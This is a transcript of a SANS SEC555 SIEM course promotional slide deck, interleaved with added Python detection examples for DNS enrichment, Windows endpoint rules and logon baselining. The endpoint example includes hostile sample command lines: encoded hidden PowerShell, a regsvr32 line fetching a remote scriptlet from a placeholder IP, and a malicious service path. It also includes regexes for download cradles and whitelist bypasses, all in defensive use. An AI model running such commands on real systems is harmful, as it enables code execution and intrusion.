Posted 07-May-2018

SEC555

Industry’s First Neutral SIEM Training Course

Justin Henderson (GSE # 108)

@SecurityMapper

SIEM and Tactical Analytics

SEC555 | SIEM with Tactical Analysis 2

About Me

• Author of SEC555: SIEM and Tactical Analytics

• GIAC GSE # 108, Cyber Guardian Blue and Red

• 58 industry certifications (need to get a new hobby)

• Two time NetWars Core tournament winner (offense)

• Security hobbyist and community supporter

• Collecting interns/contributors in bulk (research teams)

• Release research to the community

• See https://github.com/SMAPPER


Welcome!

A copy of this talk is available at https://www.securitymapper.com

At the end of the presentation, links will be provided to download SOF-ELK and ELK Hunter

• More on these later…

Also https://github.com/SMAPPER


Vendor Specific Training

SIEM is an advanced tool with many use cases

• Requires training for proper utilization

Vendor specific training focuses on how to use the vendor's tool

• This is important and makes sense

• But a focus on the tool leaves out a focus on people and process

[Diagram: How / What / Why / When / Where]


SEC555 Training

SEC555: SIEM with Tactical Analytics is product neutral

• Focus is on utilizing a SIEM for tactical defense

• Puts focus on people and process

Sets direction for designing and building an effective SIEM

• Learn how to build your own or revitalize what you have

[Diagram: How / What / Why / When / Where]


Hewlett Packard – State of Security Operations

Annual study measures maturity of organizations

• Score ranges from 0 (no maturity) to 5 (full maturity)

• Level of 3 is ideal for most enterprise SOCs

• Scores broken down by people, processes, technology, and business integration

Five year overall average is 1.45

• Lowest scores year after year are people and processes


Why SEC555?

Working with multiple organizations, there were clear gaps in SIEM deployments

Example: One organization spent 14 months in deployment

• The SIEM was in the top 5 of the Magic Quadrant in 2014 and 2015

• Two employees during roll out (> 1 FTE of labor for 14 months)

• In less than one month an open source solution exceeded what they had


SIEM Deployment

Well they must have lacked training and planning, right?

• Both employees attended week long vendor training

• POC lasted well over three months

• Implementation had >30 days of vendor services

• One employee hired as dedicated FTE to SIEM

• One PTE and other employee(s) available to help

The above is better than what some organizations have


What Happened?

Ultimately the company discarded the commercial solution

• The open source solution is still in place

The discard was not due to a faulty commercial solution

• Again, the product is a multi-year leader in the Magic Quadrant

People and processes are more important than the tool

• Open source met needs and saved them money

SEC555 is not about switching solutions…

• Focus is to train people how to use any SIEM (tool)


Sample Concepts

Below are a few concepts addressed in SEC555:

• What to collect, where to get it, and how to collect it

• Quantity vs Quality

• Turning low value data into high value data

• Overwhelming alerts

• Inability to identify logs of interest

• Lack of processes and use cases


Course Outline

• Day 1 - SIEM Architecture

• Day 2 - Service Profiling with SIEM

• Day 3 - Endpoint Analytics

• Day 4 - Baselining and User Behavior Monitoring

• Day 5 - Correlation and Post-Mortem Analysis

• Day 6 - Capstone: Design, Detect, Defend

Days 1-5 are boot camp style (lots of hands-on labs)

* Day titles subject to change (content should not)


Day 1 - SIEM Architecture

SIEM can be complicated but does not always have to be

• Covers SIEM using a building block approach

• Demystifies complexity and makes it easier to use

Learn how to effectively implement log collection, aggregation, storage strategies, and more

• 5 out of 5 interns built and understood ELK Hunter* in less than two weeks


Day 2 - Service Profiling with SIEM

Service Logs Augmentation Techniques

• DNS

• HTTP

• HTTPS

• SMTP

Almost every network uses them

• Lots of noise = lots of logs

• Yet can be high value

Low value logs can morph into highly actionable detects

• Baby Domains

• Entropy Test (PH Imbalance)

• Invalid Fields (wrong state)

• Fuzzy Phishing
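As an added example of the augmentation ideas listed above (not code from the talk, SEC555 or SOF-ELK), the script below enriches constructed DNS query lines with the fields that make low value DNS data actionable: registered-domain age (baby domains), entropy of the longest label, and edit distance to a short brand list (fuzzy phishing). The log lines, the registration-date table, the brand list and every threshold are assumptions of this example; Shannon entropy stands in for the character-frequency scoring that freq_server.py performs, and the registration table stands in for the WHOIS-style lookup domain_stats.py provides.

```python
"""
Augment DNS query logs with derived fields that turn a noisy, low-value
source into actionable detects: domain age (baby domains), label entropy
(the "pH imbalance" test) and edit distance to brand domains (fuzzy
phishing). Added example, not code from SEC555 or SOF-ELK. Log lines,
registration dates, brand list and thresholds are all constructed here.
"""
import math
import re
from collections import Counter
from datetime import date

# Constructed sample log lines: "<timestamp> <client> <query>". Not real traffic.
DNS_LOG = [
    "2018-05-07T10:00:01Z 10.1.1.20 www.google.com",
    "2018-05-07T10:00:02Z 10.1.1.20 mail.paypa1.com",
    "2018-05-07T10:00:05Z 10.1.1.31 x7k2q9v1m4z8.badhost.net",
    "2018-05-07T10:00:07Z 10.1.1.31 cdn.microsoft.com",
]

# Hypothetical registration dates standing in for a WHOIS / domain_stats lookup.
REGISTRATION_DATES = {
    "google.com": date(1997, 9, 15),
    "paypa1.com": date(2018, 5, 1),
    "badhost.net": date(2018, 4, 25),
}

# Brands to protect against lookalikes (example list, an assumption).
BRANDS = ["paypal.com", "microsoft.com", "google.com"]

LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)$")


def registered_domain(fqdn):
    """Naive registered domain = last two labels. Assumption: no public
    suffix list is loaded, so 'example.co.uk' style names would mis-split."""
    labels = fqdn.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def shannon_entropy(s):
    """Bits per character; random (DGA-style) labels score near log2(len)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def levenshtein(a, b):
    """Edit distance; a small distance to a brand label is a lookalike."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def enrich(line, today=date(2018, 5, 7), baby_days=30, entropy_min=3.5, max_edits=2):
    """Parse one log line and attach derived fields plus detection tags.
    The thresholds are assumptions to tune per environment."""
    ts, client, qname = LOG_RE.match(line).groups()
    reg_dom = registered_domain(qname)
    longest_label = max(qname.lower().split("."), key=len)
    reg_date = REGISTRATION_DATES.get(reg_dom)
    age_days = None if reg_date is None else (today - reg_date).days
    entropy = shannon_entropy(longest_label)
    sld = reg_dom.split(".")[0]
    lookalikes = [b for b in BRANDS
                  if b != reg_dom and levenshtein(sld, b.split(".")[0]) <= max_edits]
    tags = []
    if age_days is not None and age_days < baby_days:
        tags.append("baby_domain")
    if entropy >= entropy_min:
        tags.append("high_entropy")
    if lookalikes:
        tags.append("brand_lookalike")
    return {"ts": ts, "client": client, "query": qname, "registered_domain": reg_dom,
            "domain_age_days": age_days, "entropy": round(entropy, 3),
            "lookalike_of": lookalikes, "tags": tags}


def enrich_all(lines=DNS_LOG):
    return [enrich(line) for line in lines]


if __name__ == "__main__":
    for rec in enrich_all():
        print(rec["query"], rec["domain_age_days"], rec["entropy"], rec["tags"])
```

Two practitioner caveats: Shannon entropy on short labels is capped at log2(length), so an entropy threshold must be paired with a minimum label length or replaced with a frequency-table score, and registered-domain splitting needs a public suffix list before it is trusted on real traffic.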


Day 3 - Endpoint Analytics

Endpoint logs are incredibly powerful yet underutilized

• Too much emphasis has been placed on “insert security product here”

• Endpoint logs can readily be operationalized

Strategies such as the following can be used to detect attacks:

• Long command lines

• Unauthorized service creations

• Malicious PowerShell use

• Internal Pivoting

• Brute force logins

• Whitelist evasion
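As an added example (not code from the talk, SEC555 or SOF-ELK), the detection logic below runs each of the strategies listed above over constructed Windows event records laid out the way Winlogbeat or NXLog ship them as JSON: Security 4688 (process creation), 4624/4625 (logons), and System 7045 (service installed). The events, the command-line length and brute-force thresholds, the LOLBin pattern table and the "WS-" workstation naming convention used for the pivot rule are all assumptions of this example.

```python
"""
Endpoint analytics over constructed Windows events: long command lines,
unauthorized service creation, suspicious PowerShell, internal pivoting,
brute force logins and whitelist (application control) evasion.
Added example, not code from SEC555 or SOF-ELK. Every event, threshold
and naming convention below is an assumption. 4688 only carries
CommandLine when "Include command line in process creation events" is on.
"""
import re
from collections import Counter

# Constructed events. Not real telemetry.
EVENTS = [
    {"id": 1, "EventID": 4688, "Computer": "WS-101",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + "QQBB" * 200},
    {"id": 2, "EventID": 4688, "Computer": "WS-101",
     "NewProcessName": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s /n /u /i:http://198.51.100.7/x.sct scrobj.dll"},
    {"id": 3, "EventID": 4688, "Computer": "WS-102",
     "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe report.txt"},
    {"id": 4, "EventID": 7045, "Computer": "SRV-FILE01", "ServiceName": "hQzjTvLm",
     "ImagePath": "%COMSPEC% /b /c start /b /min powershell -nop -w hidden -enc SQBFAFgA"},
    {"id": 5, "EventID": 7045, "Computer": "SRV-FILE01", "ServiceName": "Sysmon64",
     "ImagePath": r"C:\Windows\Sysmon64.exe"},
    {"id": 6, "EventID": 4624, "Computer": "WS-102", "LogonType": 3,
     "WorkstationName": "WS-101", "TargetUserName": "jdoe"},
    {"id": 7, "EventID": 4624, "Computer": "SRV-FILE01", "LogonType": 3,
     "WorkstationName": "WS-101", "TargetUserName": "jdoe"},
] + [{"id": 10 + i, "EventID": 4625, "Computer": "DC01", "IpAddress": "10.1.1.55",
      "TargetUserName": "user%d" % i} for i in range(12)]

LONG_CMDLINE = 300      # characters; assumption, tune per environment
BRUTE_FORCE_MIN = 10    # failed logons from one source; assumption

PS_SUSPICIOUS = re.compile(
    r"(?i)\s-(?:e|ec|enc|encodedcommand)\s|-nop\b|-w(?:indowstyle)?\s+hidden|\biex\b|downloadstring")
SERVICE_ALLOWED_DIRS = ("c:\\windows\\", "c:\\program files")
SERVICE_SHELL = re.compile(r"(?i)%comspec%|cmd\.exe|powershell")
# Known application-whitelisting bypass patterns, keyed by signed Windows binary.
LOLBIN_PATTERNS = {
    "regsvr32.exe": re.compile(r"(?i)/i:https?://|scrobj\.dll|\.sct\b"),
    "rundll32.exe": re.compile(r"(?i)javascript:|vbscript:"),
    "mshta.exe": re.compile(r"(?i)https?://|javascript:|vbscript:"),
}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events=EVENTS):
    """Return a list of {rule, id, detail} findings for the given events."""
    findings = []
    failed_by_src = Counter()
    for ev in events:
        eid = ev["EventID"]
        if eid == 4688:
            cl = ev.get("CommandLine", "")
            exe = basename(ev["NewProcessName"])
            if len(cl) > LONG_CMDLINE:
                findings.append({"rule": "long_command_line", "id": ev["id"], "detail": len(cl)})
            if exe == "powershell.exe" and PS_SUSPICIOUS.search(cl):
                findings.append({"rule": "suspicious_powershell", "id": ev["id"], "detail": cl[:40]})
            pat = LOLBIN_PATTERNS.get(exe)
            if pat and pat.search(cl):
                findings.append({"rule": "whitelist_evasion", "id": ev["id"], "detail": exe})
        elif eid == 7045:
            # Services spawning a shell, or living outside the usual install
            # directories, are how PsExec-style tools and droppers persist.
            path = ev["ImagePath"].strip('"').lower()
            if SERVICE_SHELL.search(path) or not path.startswith(SERVICE_ALLOWED_DIRS):
                findings.append({"rule": "unauthorized_service", "id": ev["id"], "detail": ev["ServiceName"]})
        elif eid == 4624 and ev.get("LogonType") == 3:
            # Workstation-to-workstation network logons are rare for normal
            # users and a common sign of internal pivoting.
            src, dst = ev.get("WorkstationName", ""), ev["Computer"]
            if src.startswith("WS-") and dst.startswith("WS-") and src != dst:
                findings.append({"rule": "internal_pivot", "id": ev["id"], "detail": "%s -> %s" % (src, dst)})
        elif eid == 4625:
            failed_by_src[ev["IpAddress"]] += 1
    for src, n in failed_by_src.items():
        if n >= BRUTE_FORCE_MIN:
            findings.append({"rule": "brute_force", "id": src, "detail": n})
    return findings


if __name__ == "__main__":
    for f in detect():
        print(f["rule"], f["id"], f["detail"])
```

The same rules translate directly into SIEM saved searches: the per-event rules become filters on the parsed fields, and the brute force rule becomes a count aggregation over IpAddress in a time window.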


Collection Strategies

Many attacks today are client side attacks

• Means the attack occurs at the desktop

• If desktops are the main point of attack… you might need logs from them

Part of day 3 is a focus on collection strategies

• Such as minimizing the impact of desktop logs

• Emphasis is on actionable collection that scales


Day 4 - Baselining and User Behavior Monitoring

Knowing how malware and hackers operate is important and helps

• Yet knowing yourself (a baseline of normal) is more important

• Baselining detects unauthorized changes

• Works with zero days… and everything else

Example: This author’s wife can detect a 1 degree change in household temperature

- Catches me changing the thermostat… every time

- Or the kids turning on the heater
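The thermostat analogy in code, as an added example that is not from the talk, SEC555 or SOF-ELK: learn a per-user baseline of normal logon hosts and hours from a training window of constructed logon records, then flag new events that leave that baseline. The records, the one-hour tolerance and the "new user" rule are assumptions of this example. The practitioner caveat is that the training window has to be trusted clean; an intruder already active during it gets baselined as normal.

```python
"""
Baselining user logon behaviour: learn, per user, which hosts and hours
are normal, then flag deviations in new events. Added example, not code
from SEC555 or SOF-ELK; all records and thresholds are constructed.
"""
from collections import defaultdict
from datetime import datetime

# Constructed logon records: "<timestamp> <user> <host>". Not real data.
TRAINING = [
    "2018-04-02T08:05:00 jdoe WS-101",
    "2018-04-02T13:40:00 jdoe WS-101",
    "2018-04-03T08:12:00 jdoe WS-101",
    "2018-04-03T17:20:00 jdoe WS-101",
    "2018-04-04T09:01:00 jdoe FS-SHARE01",
    "2018-04-02T07:55:00 asmith WS-102",
    "2018-04-03T08:30:00 asmith WS-102",
    "2018-04-04T16:45:00 asmith WS-102",
]

NEW_EVENTS = [
    "2018-05-07T09:10:00 jdoe WS-101",        # known host, usual hours
    "2018-05-07T03:15:00 jdoe SRV-DC01",      # never-seen host, 3 AM
    "2018-05-07T10:00:00 asmith WS-102",      # known host, usual hours
    "2018-05-07T10:05:00 svc_backup WS-102",  # account absent from the baseline
]

HOUR_TOLERANCE = 1  # hours outside the observed range before flagging; assumption


def parse(line):
    ts, user, host = line.split()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S"), user, host


def build_baseline(lines):
    """user -> {'hosts': {host: count}, 'hour_min': int, 'hour_max': int}"""
    base = {}
    for line in lines:
        ts, user, host = parse(line)
        b = base.setdefault(user, {"hosts": defaultdict(int), "hour_min": 23, "hour_max": 0})
        b["hosts"][host] += 1
        b["hour_min"] = min(b["hour_min"], ts.hour)
        b["hour_max"] = max(b["hour_max"], ts.hour)
    return base


def find_deviations(baseline, lines, tolerance=HOUR_TOLERANCE):
    """Return [(line, [reasons])] for events that leave the baseline."""
    out = []
    for line in lines:
        ts, user, host = parse(line)
        reasons = []
        b = baseline.get(user)
        if b is None:
            reasons.append("new_user")
        else:
            if host not in b["hosts"]:
                reasons.append("new_host")
            if ts.hour < b["hour_min"] - tolerance or ts.hour > b["hour_max"] + tolerance:
                reasons.append("off_hours")
        if reasons:
            out.append((line, reasons))
    return out


def run(training=TRAINING, new=NEW_EVENTS):
    return find_deviations(build_baseline(training), new)


if __name__ == "__main__":
    for line, reasons in run():
        print(line, reasons)
```

Nothing here depends on knowing the attacker's tooling, which is the point of the slide: a logon from a host the user has never touched at 3 AM is a deviation whether it came from a zero day or a stolen password.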


Day 5 - Correlation and Post-Mortem Analysis

Many public breaches have suffered from too many alerts per analyst

• 1 person @ 1 mil alerts a day = fail

• Focus is on how to put context behind alerts and go tactical

Other key concepts covered:

• Post-mortem detection of evil

• Fighting dirty with tripwires


Day 6 - Capstone: Design, Detect, Defend

Class combines hands on labs all week

• But just to drive things home day 6 is 100% lab

Defense based capture the flag

• Winners will receive a coveted SANS challenge coin

• Most importantly everyone wins by receiving hands on experience


SOF-ELK

A SIEM course requires a SIEM

• To remain neutral concepts are taught using SOF-ELK

SOF-ELK is a combination of open source solutions

• Maintained by Phil Hagen (FOR572 author) and Justin Henderson (SEC555 author)

• Effectively a free SIEM in a box

• Built for forensics and SOC use

• Did I mention it is free?


SOF-ELK Components

Primary components consist of:

• Elasticsearch - Big data storage and search platform

• Logstash - Log aggregation, parsing, and transformation

• Kibana - Used for reporting, visualizations, and dashboards

• Other components constantly being baked in such as:

• Mark Baggett’s freq_server.py and domain_stats.py

• Mark is the author of SEC573 and I’m pretty sure he regularly wears a cape and flies around saving the world


ELK Hunter

Designed for analysis, research, and proof of concept

• ELK Hunter is a test bed for configs and concepts

• Contains Security Onion, ELK, and analysis scripts

• Designed to plug into a network or deploy to a hypervisor

• Verifies legitimacy of techniques and configurations

• Discover new techniques or abnormal behaviors

• Performs mass pcap analysis, such as on Contagio dumps

• Project in pipeline to add mass analysis of Windows logs


No Strings Attached

For those of you who do not have a SIEM this course:

• Gives you a free SIEM (SOF-ELK)

• Shows you what to look for in a commercial SIEM

If you already have a SIEM you will:

• Be able to operationalize, enhance, and revitalize existing SIEM

• Be able to apply open source solutions that can integrate with existing SIEM to lower costs and/or handle high EPS logs

Regardless of your SIEM situation, this class is designed for you


Return on Investment (ROI)

Immediately after taking this course you will be able to:

• Understand and apply SIEM use, architecture, and best practices

• Identify data sources to collect logs from

• Deploy scalable log solutions that can handle any number of logs

• Enhance logs to obtain added value and correlation capabilities

• Build actionable visualizations and dashboards

• Detect adversaries by using their own tactics against them

• Establish baselines and identify unauthorized deviations

• Minimize and reduce alerts to items of interest